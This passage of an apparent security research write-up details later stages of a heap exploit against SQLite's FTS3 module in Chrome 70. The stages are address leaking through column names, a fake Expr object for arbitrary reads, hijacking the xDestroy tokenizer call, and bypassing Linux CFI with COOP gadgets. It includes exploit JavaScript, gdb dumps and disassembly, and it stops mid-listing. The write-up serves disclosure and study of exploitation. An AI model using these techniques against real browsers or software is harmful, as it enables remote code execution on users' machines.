There are a total of 8 bytes that constitute an address, but for the purpose of leaking, we only need to leak 6 of them. This is because the heap grows upwards from the lowest address, and the heap would have to grow several hundred gigabytes in order to make the 7th byte of the address flip from 0 to 1. In Stage 9, the 5th and 6th bytes are leaked one at a time. The way they are leaked is different from Stage 8. This time, it is not possible to bruteforce the byte, because setting it to an arbitrary value makes SQLite hit unmapped memory when it tries to access the column name. Therefore, the bytes have to be leaked exactly, using a different method. This is made possible by actually reading out the bytes as column names.
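
Once the individual bytes are known, they have to be combined into one address. The sketch below assumes the 1st byte is the least significant one, which is how the exploit's own heuristics appear to treat it (they scale the upper bytes by 0x1000000 and 0x100000000). The byte values are invented, and addressFromBytes is a hypothetical helper.

```javascript
// Combine bytes (least significant first) into a single address.
// Multiplication is used instead of << because JavaScript's bitwise operators
// work on 32-bit integers and would truncate anything above the 4th byte.
function addressFromBytes(bytesLowToHigh) {
    let address = 0;
    let scale = 1;
    for (const byte of bytesLowToHigh) {
        address += byte * scale;
        scale *= 0x100;
    }
    return address;
}

// Invented example: bytes 1 to 3 known from Stage 8, byte 4 bruteforced later,
// bytes 5 and 6 read out as column names in Stage 9.
const leakedBytes = [0x00, 0x50, 0x34, 0x12, 0x2a, 0x3b];
const chunkAddress = addressFromBytes(leakedBytes);
console.log(`0x${chunkAddress.toString(16)}`);
```

A 6-byte address fits comfortably within the 53 bits that a JavaScript number represents exactly, so plain numbers are sufficient here.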

This was actually not possible until the 3 bytes of the second chunk were leaked in Stage 8. Armed with knowledge of the 3 bytes, we can cook up this kind of scenario.

There are a couple of things to mention before progressing. First, it was surprising that SQLite accepts anything as a column name, including spaces, newlines, and special characters. All that was needed to make it work was to surround the entire column name with quotes. However, checking the existence of the column is not as simple as issuing a SELECT statement. For some reason, the tokenizer that handles the SELECT statement eats the entire column name between the quotes and treats it like an *. After testing other queries, we came across INSERT. By surrounding the column name with parentheses and quotes, it was possible to test whether a certain column name existed, even if the column name included whitespace and special characters.

All of this seems perfect, but it also gives rise to another question. Why not just leak all bytes using this method? Unfortunately, things are slightly more complicated.
The biggest problem with this method is that it is only possible to leak bytes that fall into the ASCII range. In the above illustration, the 6th byte is okay and will be leaked without issues. However, the 5th byte falls outside the ASCII range, and will not be leaked. The reason is that when we issue an SQL statement, if a column name contains any character at \x80 or above, SQLite treats the characters as Unicode and internally converts them to UTF-8. It is the converted UTF-8 values that are memcmp’d byte by byte with the column name that resides in memory. For instance, if we ping for a column “\xC0”, SQLite converts that into the UTF-8 form “\xC3\x80”, and “\xC3\x80” is compared to what lies in memory. Only if the two match does SQLite deem that the column exists. This brings up a serious problem: bytes can be leaked with only a 50% success rate. However, as luck would have it, the 6th byte is always within the ASCII range. This is because, as explained earlier, it would take several dozen GB’s of spray to make the 6th byte flip above 0x80. Therefore, there is no issue with the 6th byte. The problem is the 5th byte.
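
The UTF-8 effect is easy to reproduce with the standard TextEncoder API, which performs the same kind of conversion on a JavaScript string. The sketch below is only an illustration of the encoding rule, not of SQLite's internal code path, and the helper names are hypothetical. It counts how many of the 256 byte values survive the conversion unchanged.

```javascript
// UTF-8 bytes produced for the character whose code point equals the byte value.
function utf8BytesForCodePoint(codePoint) {
    return Array.from(new TextEncoder().encode(String.fromCodePoint(codePoint)));
}

// A byte can be matched directly only if it encodes to itself as a single byte.
function isLeakableAsIs(byteValue) {
    const encoded = utf8BytesForCodePoint(byteValue);
    return encoded.length === 1 && encoded[0] === byteValue;
}

const toHex = (bytes) => bytes.map((b) => b.toString(16).padStart(2, "0")).join(" ");
console.log(`0x41 -> ${toHex(utf8BytesForCodePoint(0x41))}`);
console.log(`0xc0 -> ${toHex(utf8BytesForCodePoint(0xc0))}`);

let leakableCount = 0;
for (let value = 0; value < 0x100; value++) {
    if (isLeakableAsIs(value)) {
        leakableCount++;
    }
}
console.log(`${leakableCount} of 256 byte values encode to themselves`);
```

Exactly half of the byte values pass the check, which is where the 50% figure comes from.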

It would be sad to say that we would have to live with the 5th byte issue, and pray to god that it falls within that range. However, all things can be fixed. The following illustrates how to fix this issue.

Technically, the memcpy isn’t actually copying backwards. It’s just starting from a lower offset than 0x7FFFFFFF, such as 0x7FFFFFF0, and then copying all the way up to 0x80000000.
With this, it is possible to leak almost any byte by constructing a Unicode lookup table. Constructing this table requires quite some time and effort, so it was not implemented in the exploit, but this would be the right way to correct this issue. Also, since the Unicode library used by SQLite does not do a one-to-one matching on all Unicode characters, but rather translates them programmatically, there could be cool ways to abuse the Unicode engine to produce a sequence of bytes that could be looked up easily, without having to construct a full-blown table. This is left as an exercise for the interested reader. The exploit tests the 5th byte, and if it falls outside the ASCII range, it prints that the exploit should be run again after fully closing Chrome and reopening it, to get a better 5th byte value.

After this stage, the exploit can finally start bruteforcing the 4th byte.
Based on the values that were leaked from the topmost bytes, the exploit runs a series of heuristics to guess the start value for bruteforcing, so that it falls within a mapped region, as well as making sure that the value is lower than the actual byte to be leaked. The actual heuristics would look as follows.

    if(fts3_azColumn_leaked_byte_count >= 3){
        console.log(`Truncate it on purpose. We're still gonna brute the 4th byte because we don't know whether the leaked 4th byte is case insensitive and hence, inaccurate`);

        fts3_azColumn_leaked_value = (fts3_azColumn_leaked_value / Math.pow(0x100, fts3_azColumn_leaked_byte_count - 3)) >>> 0;
        fts3_azColumn_leaked_byte_count = 3;

        console.log(`Case 0`);
        leak_base_address = fts3_azColumn_leaked_value * 0x1000000;
        leak_base_address -= 0x20000000;
        leak_base_address += B_0x1000_offset_3bytes;
    }
    else{
        if((fts3_azColumn_leaked_byte_count == 2) &&
                (fts3_zWriteExprlist_leaked_byte_count > 2)
               ){
            console.log(`Case 1`);
            leak_base_address = fts3_azColumn_leaked_value * 0x100000000;
            leak_base_address += 0x80 * 0x1000000;
            leak_base_address += B_0x1000_offset_3bytes;
        }
        else if((fts3_azColumn_leaked_byte_count == 2) &&
                (fts3_zWriteExprlist_leaked_byte_count == 2) &&
                (fts3_azColumn_leaked_value_second_byte == (fts3_zWriteExprlist_leaked_value_second_byte + 1))){
            console.log(`Case 2`);
            leak_base_address = fts3_azColumn_leaked_value * 0x100000000;
            leak_base_address += B_0x1000_offset_3bytes;
        }
        else if((fts3_azColumn_leaked_byte_count == 2) &&
                (fts3_zWriteExprlist_leaked_byte_count == 2) &&
                (fts3_azColumn_leaked_value_second_byte == fts3_zWriteExprlist_leaked_value_second_byte)
               ){
            console.log(`Case 3`);
            // Very weird case. Only happened once...? Just gamble on the address here. Might not work.
            leak_base_address = fts3_azColumn_leaked_value * 0x100000000;
            leak_base_address += 0x80 * 0x1000000;
            leak_base_address += B_0x1000_offset_3bytes;
        }
        else{
            console.log(`Don't know how to handle this case. Stopping here...`);
            return;
        }
    }

This would handle all cases. Afterwards, the same logic in Stage 8 is applied to bruteforce the 4th byte. Now all 6 bytes of the address have been leaked. It’s time to proceed to Stage 10 and create an AAR.
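As a worked example of the arithmetic in “Case 0”, the sketch below runs the same steps on made-up inputs. The function name and all input values are hypothetical. Only the constants 0x1000000 and 0x20000000 come from the listing above.

```javascript
// Worked example of "Case 0" with made-up inputs (all values hypothetical).
function case0StartAddress(leakedValue, leakedByteCount, low3Bytes) {
  // Keep only the top three leaked bytes, as the listing does.
  const top3 = (leakedValue / Math.pow(0x100, leakedByteCount - 3)) >>> 0;
  let base = top3 * 0x1000000; // place them above the three low bytes
  base -= 0x20000000;          // back the 4th byte off by 0x20 so the
                               // bruteforce starts below the real value
  base += low3Bytes;           // low three bytes leaked in Stage 8
  return base;
}

// Four bytes leaked (0x7f94fc59), low three bytes assumed to be 0x123000.
const startAddress = case0StartAddress(0x7f94fc59, 4, 0x123000);
console.log(startAddress.toString(16)); // 7f94dc123000
```

All intermediate values stay below 2^53, so ordinary JavaScript numbers represent them exactly.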

Stage 10

If we can’t leak exact values from column names because of the Unicode restriction, then how is it possible to create an AAR?

For this, we are going to use another field in the Column object that hasn’t been covered in detail, which is the Default Value. It is possible to set a default value using the following SQL statement.

CREATE TABLE TABLE_NAME (col1 DEFAULT default_value);

As a reminder, the following is the definition of the Column object.

/*
** information about each column of an SQL table is held in an instance
** of this structure.
*/
struct Column {
  char *zName;     /* Name of this column, \000, then the type */
  Expr *pDflt;     /* Default value of this column */
  char *zColl;     /* Collating sequence.  If NULL, use the default */
  u8 notNull;      /* An OE_ code for handling a NOT NULL constraint */
  char affinity;   /* One of the SQLITE_AFF_... values */
  u8 szEst;        /* Estimated size of value in this column. sizeof(INT)==1 */
  u8 colFlags;     /* Boolean properties.  See COLFLAG_ defines below */
};

These default values get stored in the pDflt field of the Column object. They are not stored as a plain stream of bytes, but in what SQLite calls an expression tree. Expressions represent part of an SQL statement, usually the part at the end such as the WHERE clause. This is the user-configurable part of an SQL query, where the user can add different kinds of keywords and clauses so that the query behaves differently depending on the entire statement. The entire expression is represented as a tree, so SQLite can process it recursively. The default value specified at the end of the CREATE TABLE statement is also treated as an expression, and is stored as such a tree. Let’s look at the definition of the Expr structure.

struct Expr {
  u8 op;                 /* Operation performed by this node */
  char affinity;         /* The affinity of the column or 0 if not a column */
  u32 flags;             /* Various flags.  EP_* See below */
  union {
    char *zToken;          /* Token value. Zero terminated and dequoted */
    int iValue;            /* Non-negative integer value if EP_IntValue */
  } u;

  /* If the EP_TokenOnly flag is set in the Expr.flags mask, then no
  ** space is allocated for the fields below this point. An attempt to
  ** access them will result in a segfault or malfunction.
  *********************************************************************/


  Expr *pLeft;           /* Left subnode */
  Expr *pRight;          /* Right subnode */

  //snipped for brevity
}

Like any other tree, it has a left and right node pointer, and it has certain flags and a pointer that points to the actual node data. Let’s see how a default value looks in memory.

sqlite> CREATE TABLE t1(c1 INTEGER DEFAULT 0x1337);

(gdb) p *(Table*)0x74b568
$23 = {
  zName = 0x728d08 "t1",
  aCol = 0x74ac38,
  pIndex = 0x0,
  pSelect = 0x0,
  pFKey = 0x0,
  zColAff = 0x0,
  pCheck = 0x0,
  tnum = 2,
  nTabRef = 1,
  tabFlags = 0,
  iPKey = -1,
  nCol = 1,
  nRowLogEst = 200,
  szTabRow = 30,
  keyConf = 0 '\000',
  addColOffset = 41,
  nModuleArg = 0,
  azModuleArg = 0x0,
  pVTable = 0x0,
  pTrigger = 0x0,
  pSchema = 0x72aa48,
  pNextZombie = 0x0
}

(gdb) p *(Column*)0x74ac38
$24 = {
  zName = 0x74b5f8 "c1",
  pDflt = 0x74b688,
  zColl = 0x0,
  notNull = 0 '\000',
  affinity = 68 'D',
  szEst = 1 '\001',
  colFlags = 4 '\004'
}

(gdb) p *(Expr*)0x74b688
$25 = {
  op = 169 '\251',
  affinity = 0 '\000',
  flags = 12288,
  u = {
    zToken = 0x74b6b4 "0x1337",
    iValue = 7648948
  },
  pLeft = 0x74b6c0,
  pRight = 0x0,
  x = {
    pList = 0x0,
    pSelect = 0x0
  },
  nHeight = 0,
  iTable = 858880048,
  iColumn = 14131,
  iAgg = -256,
  iRightJoinTable = 0,
  op2 = 0 '\000',
  pAggInfo = 0x80c4000000008f,
  pTab = 0x1337,
  pWin = 0x0
}

(gdb) p *(Expr*)0x74b6c0
$26 = {
  op = 143 '\217',
  affinity = 0 '\000',
  flags = 8438784,
  u = {
    zToken = 0x1337 <error: Cannot access memory at address 0x1337>,
    iValue = 4919
  },
}

This might seem a little complicated at first glance. The only important things in the Expr object are the opcode, the flags, and the zToken. Here is how the above series of objects would look in a more graphical fashion.

Here is what we want to achieve, in order to gain AAR.

We would create a fake Expr object. The Expr object would represent a leaf node (EP_TokenOnly | EP_Leaf) so that SQLite won’t go looking into the pLeft and pRight members, and the node would be marked as static (EP_Static) so that SQLite won’t free the zToken member when it disposes of the expression tree. Then, the opcode would be set to OP_String, so that SQLite treats the address that zToken points to as a NULL-terminated string.
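A byte-level sketch of such an object could look like the following. It rests on several assumptions. The field offsets (op at 0, flags at 4, u.zToken at 8) are inferred from the gdb dump above on x86-64. The EP_* values are taken to match SQLite sources of that era and should be checked against the target's sqliteInt.h. `stringOpcode` is a placeholder that the caller has to supply, since its numeric value is not given in this post.

```javascript
// Sketch of a 16-byte "token only" Expr image for x86-64 (little-endian).
// ASSUMPTIONS: offsets inferred from the gdb dump; EP_* values must be
// verified against the target's sqliteInt.h; `stringOpcode` is a placeholder.
const EP_TokenOnly = 0x004000;
const EP_Static = 0x008000;
const EP_Leaf = 0x800000;

function buildFakeExpr(stringOpcode, targetAddress) {
  const image = new DataView(new ArrayBuffer(16));
  image.setUint8(0, stringOpcode);                              // op
  image.setUint8(1, 0);                                         // affinity
  image.setUint32(4, EP_TokenOnly | EP_Static | EP_Leaf, true); // flags
  image.setBigUint64(8, BigInt(targetAddress), true);           // u.zToken
  return new Uint8Array(image.buffer);
}

// Example with a placeholder opcode and a made-up address to read from.
const fakeExpr = buildFakeExpr(0x00, 0x7f94dc123000n);
console.log(Array.from(fakeExpr, (b) => b.toString(16).padStart(2, "0")).join(" "));
```

As a sanity check on the assumed flag values, the integer node in the dump has flags 0x80C400, which is these three bits plus 0x400 (presumably EP_IntValue).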

The next question is: where are we going to write this fake Expr object?
This brings back the requirement that was presented in Stage 8. The reason we wanted the three chunks in order is that we could then assume that the column object array (the first chunk) is placed right before the leaked second chunk. With the objects laid out that way, both writing arbitrary data that represents the fake Expr object and retrieving that object’s address are solved at once. This is depicted in the following pictures.

This explains why the precondition in Stage 8 was required. However, we should at least discuss how this requirement can be eliminated, because having the 3 chunks allocated sequentially is the least reliable part of the entire exploit, and it would be nice if there was a way to avoid it. In order to get rid of the requirement, the following steps can be taken.

  1. At the beginning of Stage 8, allocate a bunch of 0x2000 chunks. Then deallocate one of the 0x2000 chunks in the middle.
  2. Drop the table that holds the 0x1000 chunk, and allocate a column array with 104 column names. The corrupted column index will allocate a column name of size 0x2000. This places the column object array back in its 0x1000 slot, and places the 0x2000 column name into the hole that was created in step 1.
  3. Execute Stage 8 to leak the lower 3 bytes of the 0x2000 chunk address.
  4. Corrupt the column name address so that it points to the next 0x2000 chunk.
  5. Use the INSERT statement to find which table is responsible for that chunk.
  6. Drop that table. Place the Fts3Table chunk there.
  7. Corrupt the column name address so that it points to the 0x2000 chunk that’s after the Fts3Table.
  8. Use the INSERT statement to find which table is responsible for that chunk.
  9. Drop that table. Place a 0x2000 chunk with arbitrary data there, which can be used for the fake Expr object.
  10. Now we have 3 chunks allocated sequentially, and the addresses of all three chunks are known.

This is far more reliable and precise than the “Pray that the three 0x1000 chunks are next to each other” method. The only problem is finding a primitive with which the user can allocate an arbitrarily sized chunk filled with attacker-controlled data. This cannot be done with column names because of the UTF-8 conversion. How to find such a primitive is discussed at the end of the blog post, in the “Increasing Speed and Reliability” section.

Now back to the Expr objects. The final question is how the fake Default Value object could be used to read data from an arbitrary address. After all, only the default value has been set, and SQLite has no way to read the default value out of the table.

This is true and not true. It is impossible to issue a query to read the default value that was set by the CREATE TABLE statement. However, it is possible to indirectly read it. The logic behind it is simple.

We INSERT a single value into the corrupted table using an innocent column, and let SQLite write the default value of the corrupted column into the table. Under the hood, SQLite goes through each column in the Column object array and checks whether the column object has a Default Value expression tree set. If the pointer is 0, SQLite fills that column’s data in the new row with NULL. If it sees an address, it follows the expression tree and parses it. SQLite sees our fake Expr object, and sees that it is a leaf node. It looks at the node’s opcode and sees OP_String. Therefore, it treats the node value as a string address, grabs the NULL-terminated string from that address, and uses it to fill the new row’s column data. Since SQLite does all of this itself, there is no UTF-8 conversion involved, and the value is simply treated as a NULL-terminated string and copied as-is.
Later, we can SELECT that value from the table and read it back out. Since the column type of the corrupted column is set to BLOB, SQLite treats the underlying value as a series of raw bytes and returns it to the user. For the user to actually see the data in its original form, the result can be passed through the hex() or the quote() function, which converts the bytes into a series of ASCII characters representing the hex data.

This is how an AAR is constructed. We indirectly read the data by INSERTing and then SELECTing. Since the AAR can only read strings up to a NULL byte, all data is read one byte at a time, and the resulting bytes are combined into an array that can be processed later. Using this, it is possible to leak all data in the Fts3Table object, including the very first member. This bypasses ASLR. We are going to further abuse this AAR to read more interesting things.
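The byte-at-a-time reconstruction can be sketched as follows. `readCString` is a hypothetical stand-in for the INSERT-then-SELECT round trip. Here it is simulated over a local buffer so that the logic can be run on its own.

```javascript
// Sketch: rebuild arbitrary bytes from a primitive that only returns
// NUL-terminated strings. The primitive is simulated over a local buffer;
// in the exploit it would be the INSERT-then-SELECT round trip.
function makeSimulatedPrimitive(buffer, baseAddress) {
  return function readCString(address) {
    const out = [];
    for (let i = address - baseAddress; i < buffer.length && buffer[i] !== 0; i++) {
      out.push(buffer[i]);
    }
    return out; // bytes up to, but not including, the first NUL
  };
}

function readBytes(readCString, address, length) {
  const result = new Uint8Array(length);
  for (let i = 0; i < length; i++) {
    const chunk = readCString(address + i);
    // An empty string means the byte at this address is itself NUL.
    result[i] = chunk.length === 0 ? 0 : chunk[0];
  }
  return result;
}

const simulatedHeap = Uint8Array.from([0x10, 0x00, 0x30, 0x40, 0x00, 0x00]);
const simulatedRead = makeSimulatedPrimitive(simulatedHeap, 0x1000);
console.log(Array.from(readBytes(simulatedRead, 0x1000, 5)));
```

Taking only the first byte of each result costs one round trip per byte, but it means embedded NUL bytes need no special handling.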

Stage 11

Now the final problem is how to control $RIP.

The current situation is that AAR is achieved, but AAW isn’t. Therefore, in order to skip AAW, it would be desirable to find a code execution primitive in one of the objects that we can OOB write. In the current heap layout, the only object with potentially interesting fields that lies within the boundaries of the OOB write is the third chunk, which is the Fts3Table object. Remember this?

That is the object we want to corrupt. We can start from the first chunk which is the topmost chunk in the above picture, OOB write while protecting the column array data all the way to the end of the first chunk, then all the way to the end of the second chunk, and start corrupting fields in the Fts3Table object. Now the question is if there is any interesting field that would lead to code execution.

After scavenging through the fts3 Virtual Table Methods, we came across this function.

static const sqlite3_module fts3Module = {
  /* iVersion      */ 2,
  /* xCreate       */ fts3CreateMethod,
  /* xConnect      */ fts3ConnectMethod,
  /* xBestIndex    */ fts3BestIndexMethod,
  /* xDisconnect   */ fts3DisconnectMethod,
  /* xDestroy      */ fts3DestroyMethod,
  /* xOpen         */ fts3OpenMethod,
  /* xClose        */ fts3CloseMethod,
  /* xFilter       */ fts3FilterMethod,
  /* xNext         */ fts3NextMethod,
  /* xEof          */ fts3EofMethod,
  /* xColumn       */ fts3ColumnMethod,
  /* xRowid        */ fts3RowidMethod,
  /* xUpdate       */ fts3UpdateMethod,
  /* xBegin        */ fts3BeginMethod,
  /* xSync         */ fts3SyncMethod,
  /* xCommit       */ fts3CommitMethod,
  /* xRollback     */ fts3RollbackMethod,
  /* xFindFunction */ fts3FindFunctionMethod,
  /* xRename */       fts3RenameMethod,
  /* xSavepoint    */ fts3SavepointMethod,
  /* xRelease      */ fts3ReleaseMethod,
  /* xRollbackTo   */ fts3RollbackToMethod,
};

/*
** The xDisconnect() virtual table method.
*/
static int fts3DisconnectMethod(sqlite3_vtab *pVtab){
  Fts3Table *p = (Fts3Table *)pVtab;
  int i;

  assert( p->nPendingData==0 );
  assert( p->pSegments==0 );

  /* Free any prepared statements held */
  sqlite3_finalize(p->pSeekStmt);
  for(i=0; i<SizeofArray(p->aStmt); i++){
    sqlite3_finalize(p->aStmt[i]);
  }
  sqlite3_free(p->zSegmentsTbl);
  sqlite3_free(p->zReadExprlist);
  sqlite3_free(p->zWriteExprlist);
  sqlite3_free(p->zContentTbl);
  sqlite3_free(p->zLanguageid);

  /* Invoke the tokenizer destructor to free the tokenizer. */
  p->pTokenizer->pModule->xDestroy(p->pTokenizer);

  sqlite3_free(p);
  return SQLITE_OK;
}

The line that matters is the call to p->pTokenizer->pModule->xDestroy(p->pTokenizer) near the end of fts3DisconnectMethod. p->pTokenizer is a field within the Fts3Table object, located at offset 0x48 from the beginning. The function reads that field, dereferences it a couple of times and uses the final value as a function pointer. This is a perfect control-flow hijacking primitive. In assembly, that call looks like this.

mov     rdi, [r12+48h]
mov     rax, [rdi]
mov     rcx, [rax+10h]
call    rcx

So what we’re trying to achieve looks like the following.
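As a rough model of that pointer chain, the sketch below replays the three loads from the assembly over a made-up address space. All addresses and names are hypothetical. Only the offsets 0x48 and 0x10 come from the listing.

```javascript
// Simulation of the three dependent loads that precede `call rcx`.
// `fakeHeap` maps a qword address to its value; all addresses are made up.
function resolveCallTarget(heap, fts3TableAddr) {
  const pTokenizer = heap.get(fts3TableAddr + 0x48n); // mov rdi, [r12+48h]
  const pModule = heap.get(pTokenizer);               // mov rax, [rdi]
  const xDestroy = heap.get(pModule + 0x10n);         // mov rcx, [rax+10h]
  return { target: xDestroy, firstArgument: pTokenizer };
}

const FTS3_TABLE = 0x7f0000001000n;     // hypothetical Fts3Table address
const FAKE_TOKENIZER = 0x7f0000002000n; // hypothetical attacker-controlled data
const FAKE_MODULE = 0x7f0000002100n;    // hypothetical fake module table

const fakeHeap = new Map([
  [FTS3_TABLE + 0x48n, FAKE_TOKENIZER],       // corrupted pTokenizer field
  [FAKE_TOKENIZER, FAKE_MODULE],              // fake pModule pointer
  [FAKE_MODULE + 0x10n, 0x4141414141414141n], // fake xDestroy slot
]);

const callInfo = resolveCallTarget(fakeHeap, FTS3_TABLE);
console.log(callInfo.target.toString(16)); // 4141414141414141
```

The first argument register ends up pointing at the fake tokenizer, so the called function sees attacker-controlled data as its object.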

After finding the primitive, a payload was constructed to control $RIP. This was built for the debug build of Chromium. After that, the exploit was ported to the vulnerable Chrome stable version (v70.0.3538.77). While porting it, a peculiar thing happened. $RIP would no longer be controlled, but would jump to a UD2 instruction instead. At first, we thought that some kind of custom exception handler was in play and was snatching the SIGSEGV, but it turned out to be something else. We observed the program right before $RIP was controlled, and realized that the above assembly had changed and had additional logic in the release build. It looked like the following.

.text:0000000004C040A4                 mov     rdi, [r12+48h]
.text:0000000004C040A9                 mov     rax, [rdi]
.text:0000000004C040AC                 mov     rcx, [rax+10h]
.text:0000000004C040B0                 lea     r14, loc_19C17F0
.text:0000000004C040B7                 mov     rax, rcx
.text:0000000004C040BA                 sub     rax, r14
.text:0000000004C040BD                 ror     rax, 3
.text:0000000004C040C1                 cmp     rax, 104h
.text:0000000004C040C7                 ja      loc_4C041C1
.text:0000000004C040CD                 call    rcx
.text:0000000004C041C1 loc_4C041C1:                            ; CODE XREF: sub_4C03B40+7C↑j
.text:0000000004C041C1                 ud2

This was obviously some kind of Control Flow Integrity logic. The program was checking whether the call destination was within a certain range, and if it wasn’t, it would ruthlessly jump to UD2, terminating the process.
This was interesting, because we had seen no mention of CFI being enabled on Windows builds, so encountering a CFI implementation on Linux was a surprise. In fact, there is a page on the Chromium website that explains its CFI, and it states that CFI is currently implemented only on Linux and is slated for release on other platforms some time in the future. All of this is great, but what it means for an exploiter is that the CFI has to be bypassed.
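The range check in the listing can be modelled in a few lines. This is a sketch of the `sub` / `ror` / `cmp` / `ja` sequence only, using the table base and limit shown in the disassembly. The function names are hypothetical.

```javascript
// Model of: sub rax, r14 ; ror rax, 3 ; cmp rax, 104h ; ja -> ud2
const MASK64 = (1n << 64n) - 1n;

function ror64(value, count) {
  const v = value & MASK64;
  return ((v >> count) | (v << (64n - count))) & MASK64;
}

function cfiAllowsCall(target, tableBase, maxIndex) {
  // The rotate turns any target that is not 8-byte aligned relative to the
  // table into a huge value, so one unsigned compare checks range and alignment.
  const index = ror64((target - tableBase) & MASK64, 3n);
  return index <= maxIndex;
}

const TABLE_BASE = 0x19c17f0n; // loc_19C17F0 from the listing
console.log(cfiAllowsCall(0x19c17f8n, TABLE_BASE, 0x104n));         // true
console.log(cfiAllowsCall(0x19c17f4n, TABLE_BASE, 0x104n));         // false
console.log(cfiAllowsCall(0x4141414141414141n, TABLE_BASE, 0x104n)); // false
```

Because every permitted target is an entry of the jump table itself, an arbitrary pointer fails the check no matter where it points.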

The go-to way to bypass CFI is to achieve AAR/AAW before getting code execution, and work forwards from there. Right now, we only have AAR and no AAW. The first idea to achieve AAW was to manipulate the Expression trees representing the Default Value of a Column object. This is because during the course of experimenting with fake Expr objects, playing with various flags and values led to all kinds of interesting crashes. So conjuring an AAW by creating the right sequence of Expression nodes was one way to deal with it. However, this required another deep dive into how SQLite handles expression trees, and a scavenge through the source code of all of the opcodes, and the accompanying functions.

What we decided to use instead were the artifacts lying right in front of us: the list of functions that the CFI allowed us to call.

For CFI checks on other parts of the code, the function list that CFI permits is very narrow.

.text:0000000004C04BB5                 mov     [rbp-50h], rax
.text:0000000004C04BB9                 mov     rbx, [rax+18h]
.text:0000000004C04BBD                 mov     rax, rbx
.text:0000000004C04BC0                 lea     rcx, loc_19B76B0
.text:0000000004C04BC7                 sub     rax, rcx
.text:0000000004C04BCA                 ror     rax, 3
.text:0000000004C04BCE                 cmp     rax, 8
.text:0000000004C04BD2                 ja      loc_4C06207

In this case, CFI only allows jumps to a handful of functions predefined in a jump table (indices 0 through 8).
However, in our case, we had a choice of roughly 260 functions to jump to (indices 0 through 0x104).

.text:0000000004C040A4                 mov     rdi, [r12+48h]
.text:0000000004C040A9                 mov     rax, [rdi]
.text:0000000004C040AC                 mov     rcx, [rax+10h]
.text:0000000004C040B0                 lea     r14, loc_19C17F0
.text:0000000004C040B7                 mov     rax, rcx
.text:0000000004C040BA                 sub     rax, r14
.text:0000000004C040BD                 ror     rax, 3
.text:0000000004C040C1                 cmp     rax, 104h
.text:0000000004C040C7                 ja      loc_4C041C1
.text:0000000004C040CD                 call    rcx
.text:0000000004C041C1 loc_4C041C1:                            ; CODE XREF: sub_4C03B40+7C↑j
.text:0000000004C041C1                 ud2


.text:00000000019C17F0 loc_19C17F0:                            ; DATA XREF: sub_1E78120+1C2↓o
.text:00000000019C17F0                 jmp     loc_4B30FE0
.text:00000000019C17F0 ; ---------------------------------------------------------------------------
.text:00000000019C17F5                 align 8
.text:00000000019C17F8                 jmp     loc_4B31AC0
.text:00000000019C17F8 ; ---------------------------------------------------------------------------
.text:00000000019C17FD                 align 20h
.text:00000000019C1800                 jmp     loc_4B390E0
.text:00000000019C1800 ; ---------------------------------------------------------------------------
.text:00000000019C1805                 align 8
.text:00000000019C1808                 jmp     loc_4B19720
.text:00000000019C1808 ; ---------------------------------------------------------------------------
.text:00000000019C180D                 align 10h
.text:00000000019C1810                 jmp     loc_4B194F0
.text:00000000019C1810 ; ---------------------------------------------------------------------------
.text:00000000019C1815                 align 8
.text:00000000019C1818                 jmp     loc_4B34B50
.text:00000000019C1818 ; ---------------------------------------------------------------------------
.text:00000000019C181D                 align 20h
.text:00000000019C1820                 jmp     loc_4B196F0
.text:00000000019C1820 ; ---------------------------------------------------------------------------
.text:00000000019C1825                 align 8
.text:00000000019C1828                 jmp     loc_4B19720
.text:00000000019C1828 ; ---------------------------------------------------------------------------
.text:00000000019C182D                 align 10h
.text:00000000019C1830                 jmp     loc_4B32DB0
.text:00000000019C1830 ; ---------------------------------------------------------------------------
.text:00000000019C1835                 align 8
.text:00000000019C1838                 jmp     loc_4B31AE0
.text:00000000019C1838 ; ---------------------------------------------------------------------------
.text:00000000019C183D                 align 20h
.text:00000000019C1840                 jmp     loc_4B196F0
...
...
...

That is a lot of functions. With such a big list of functions, we just might be able to find one that matches certain criteria and aids exploitation. This technique of calling only into functions that the CFI allows is called Counterfeit Object-Oriented Programming (COOP). The term was coined in academia, and it describes constructing Turing-complete gadget sets, in the spirit of ROP, using only functions that the CFI allows. In essence, it is a generic CFI bypass technique, provided there is a long enough list of functions to choose from. In the paper, each of the CFI-compliant functions is called a vfgadget. We will use this term for the remainder of the blog post, as a short form of “CFI compliant function gadget”. The goal in the paper is to create a Turing-complete set of vfgadgets by finding various vfgadgets that serve different purposes. The most important of these is the Main Loop Vfgadget. For our purposes, however, it is not necessary to find all of these vfgadgets. We need to find exactly one, because AAR is already achieved. The reason for this will be explained in the following section.

There are actually 2 ways to abuse COOP. Both of them will be discussed in the following sections.

Bypassing CFI by gaining AAW

The first way to bypass CFI is to construct an AAW with one of the vfgadgets. What we looked for was a function of this type.

test_function(){
...

void *a = this->field1;
a->testfield = this->field2;

...
}

The goal was to call a vfgadget of the above form, and gain AAW. The function did not have to look exactly like the above listing, but anything that would lead to AAW would work. While scavenging through the list of vfgadgets, several functions were found that matched the criteria. However, most of the functions were of this form.

test_function(){
...
// A looooooooooooot of things going on here.
...

void *a = this->field1;
a->testfield = this->field2;

...
// A lot more things.
...
}

Before and after our AAW primitive was triggered, there was an abundance of code executed. Because all code within the function uses the this pointer, which points to our ROP payload, there were so many reasons for the program to crash if care wasn’t taken to build a proper fake object that passed all the pointer dereferencing and conditional checks. Therefore, it was desirable to find a vfgadget that was a lot shorter, but still achieved the goal. After an hour of scavenging, we came across this vfgadget.

.text:000000000404C690 sub_404C690     proc near               ; CODE XREF: .text:loc_19C1B60↑j
.text:000000000404C690                 mov     rcx, [rdi+18h]  ; 0x18 => 0x800
.text:000000000404C694                 movsxd  rdx, dword ptr [rcx+0Ch] ; dword 0x80C => 0
.text:000000000404C698                 xor     eax, eax
.text:000000000404C69A                 cmp     edx, [rcx+8]    ; dword 0x808 => 1
.text:000000000404C69D                 jge     short locret_404C6D2
.text:000000000404C69F                 mov     rax, [rcx]      ; 0x800 => 0x810
.text:000000000404C6A2                 shl     rdx, 4
.text:000000000404C6A6                 mov     rax, [rax+rdx]  ; 0x810 => Stack Pivot Gadget
.text:000000000404C6AA                 mov     rdx, [rdi+28h]  ; 0x28 => ret addr
.text:000000000404C6AE                 mov     [rdx], rax
.text:000000000404C6B1                 mov     rax, [rcx]
.text:000000000404C6B4                 movsxd  rdx, dword ptr [rcx+0Ch]
.text:000000000404C6B8                 shl     rdx, 4
.text:000000000404C6BC                 movsxd  rax, dword ptr [rax+rdx+8] ; dword 0x818 => 0
.text:000000000404C6C1                 mov     rdx, [rdi+28h]
.text:000000000404C6C5                 mov     [rdx+8], rax
.text:000000000404C6C9                 add     dword ptr [rcx+0Ch], 1
.text:000000000404C6CD                 mov     eax, 1
